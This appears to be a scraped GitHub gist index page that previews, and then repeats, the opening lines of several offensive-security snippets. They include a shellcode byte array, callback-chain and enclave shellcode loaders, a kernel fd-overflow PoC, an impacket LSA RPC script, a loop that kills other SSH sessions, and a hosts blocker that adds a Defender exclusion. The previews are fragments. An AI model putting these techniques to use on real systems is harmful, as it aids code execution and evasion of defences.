emdnaia

## msblock.ps1
# ms-block.ps1 - Windows telemetry/AI blocker (idempotent, no dupes)
# Run as Administrator
$hostsPath = "$env:windir\System32\drivers\etc\hosts"
$marker = "# --- MS-BLOCK START ---"
$endMarker = "# --- MS-BLOCK END ---"

# Exclude hosts file from Defender
Add-MpPreference -ExclusionPath $hostsPath -ErrorAction SilentlyContinue

# Read current hosts, strip any previous MS-BLOCK section

## smellyklez_callback_chain.c
/*
 * Callback Chaining PoC - Windows API Callback Chain Execution
 */

#include <Windows.h>
#include <dbghelp.h>
#include <powrprof.h>
#include <stdio.h>

#pragma comment(lib, "user32.lib")

## taking_brains101.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                emdnaia
                / taking_brains101.md
            
            
              Last active
              January 1, 2026 13:35
            
          
    Psychological Manipulation Pipeline: A Scientifically Validated Framework

Context

Reference: https://x.com/Daractenus/status/2006666543669887158
This document analyzes the psychological mechanisms exploited in influence operations, with specific reference to AI-generated disinformation campaigns (e.g., Russian bot networks deploying AI-generated "Polish women" demanding EU exit). The framework synthesizes peer-reviewed research from cognitive psychology, social psychology, and behavioral science.

Phase 1: Target Identification & Profiling


## Stored_Procedure_Honeypot.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              1 star
            
          
                emdnaia
                / Stored_Procedure_Honeypot.md
            
            
              Last active
              November 7, 2025 23:45
            
              
                Stored_Procedure_Honeypot
              
          
    5 min POC inspired by https://x.com/IceSolst/status/1986764951940124676?s=20
# Install MariaDB
sudo dnf install mariadb-server mariadb -y

# Start and enable service
sudo systemctl start mariadb
sudo systemctl enable mariadb


## fdtable_intmax_poc.c
/*

## File Descriptor INT_MAX Overflow
----
- Info:

Tweet: https://x.com/spendergrsec/status/1958264076162998771

Ref: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04a2c4b4511d186b0fce685da21085a5d4acd370

## nossh.sh
MY_TTY=$(tty | sed 's/\/dev\///')
MY_SESSION_PIDS=$(ps aux | grep "sshd-session.*$MY_TTY" | awk '{print $2}' | tr '\n' '|' | sed 's/|$//')

echo "Protecting PIDs: $MY_SESSION_PIDS"

while true; do
    ps aux | grep 'sshd-session' | grep -v grep | grep -v '\[listener\]' | awk '{print $2}' | grep -vE "^($MY_SESSION_PIDS)$" | xargs -r kill -9 2>/dev/null
    sleep 0.01  # Check every 10ms - way faster
done

## JasonToddIsTheBestRobin.c
#include <windows.h>
#include <wininet.h>
#include <stdio.h>

#pragma comment(lib, "wininet.lib")

// notepad.exe shellcode
char shellcode[] =  {
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
    0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,

## enclave.c
#include <stdio.h>
#include <windows.h>

// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll

EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
	_In_ PENCLAVE_ROUTINE Routine,

## nginx-reverse-proxy-sing-box.conf
stream {
        map $ssl_preread_server_name $singbox {
                trojan.example.com trojan;
                trojan-ws.example.com trojan-ws;
                trojan-ws-6.example.com trojan-ws-6;
                vmess.example.com vmess;
                vmess-ws.example.com vmess-ws;
                vmess-ws-6.example.com vmess-ws-6;
        }
        upstream trojan {

## lsarlookupsids3_aes.py
from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc
from impacket.uuid import bin_to_uuidtup
from binascii import unhexlify
from random import randbytes
import sys

# Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3)
# Pure TCP RPC is used (ncacn_ip_tcp option)
# AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848)
# Tested with impacket 0.12.0 on GOAD
	# ms-block.ps1 - Windows telemetry/AI blocker (idempotent, no dupes)
	# Run as Administrator
	$hostsPath = "$env:windir\System32\drivers\etc\hosts"
	$marker = "# --- MS-BLOCK START ---"
	$endMarker = "# --- MS-BLOCK END ---"

	# Exclude hosts file from Defender
	Add-MpPreference -ExclusionPath $hostsPath -ErrorAction SilentlyContinue

	# Read current hosts, strip any previous MS-BLOCK section
	/*
	* Callback Chaining PoC - Windows API Callback Chain Execution
	*/

	#include <Windows.h>
	#include <dbghelp.h>
	#include <powrprof.h>
	#include <stdio.h>

	#pragma comment(lib, "user32.lib")
	/*

	## File Descriptor INT_MAX Overflow
	----
	- Info:

	Tweet: https://x.com/spendergrsec/status/1958264076162998771

	Ref: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04a2c4b4511d186b0fce685da21085a5d4acd370
	MY_TTY=$(tty \| sed 's/\/dev\///')
	MY_SESSION_PIDS=$(ps aux \| grep "sshd-session.*$MY_TTY" \| awk '{print $2}' \| tr '\n' '\|' \| sed 's/\|$//')

	echo "Protecting PIDs: $MY_SESSION_PIDS"

	while true; do
	ps aux \| grep 'sshd-session' \| grep -v grep \| grep -v '\[listener\]' \| awk '{print $2}' \| grep -vE "^($MY_SESSION_PIDS)$" \| xargs -r kill -9 2>/dev/null
	sleep 0.01 # Check every 10ms - way faster
	done
	#include <windows.h>
	#include <wininet.h>
	#include <stdio.h>

	#pragma comment(lib, "wininet.lib")

	// notepad.exe shellcode
	char shellcode[] = {
	0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
	0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
	#include <stdio.h>
	#include <windows.h>

	// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
	// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll

	EXTERN_C NTSYSAPI
	NTSTATUS
	NTAPI LdrCallEnclave(
	_In_ PENCLAVE_ROUTINE Routine,
	stream {
	map $ssl_preread_server_name $singbox {
	trojan.example.com trojan;
	trojan-ws.example.com trojan-ws;
	trojan-ws-6.example.com trojan-ws-6;
	vmess.example.com vmess;
	vmess-ws.example.com vmess-ws;
	vmess-ws-6.example.com vmess-ws-6;
	}
	upstream trojan {
	from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc
	from impacket.uuid import bin_to_uuidtup
	from binascii import unhexlify
	from random import randbytes
	import sys

	# Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3)
	# Pure TCP RPC is used (ncacn_ip_tcp option)
	# AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848)
	# Tested with impacket 0.12.0 on GOAD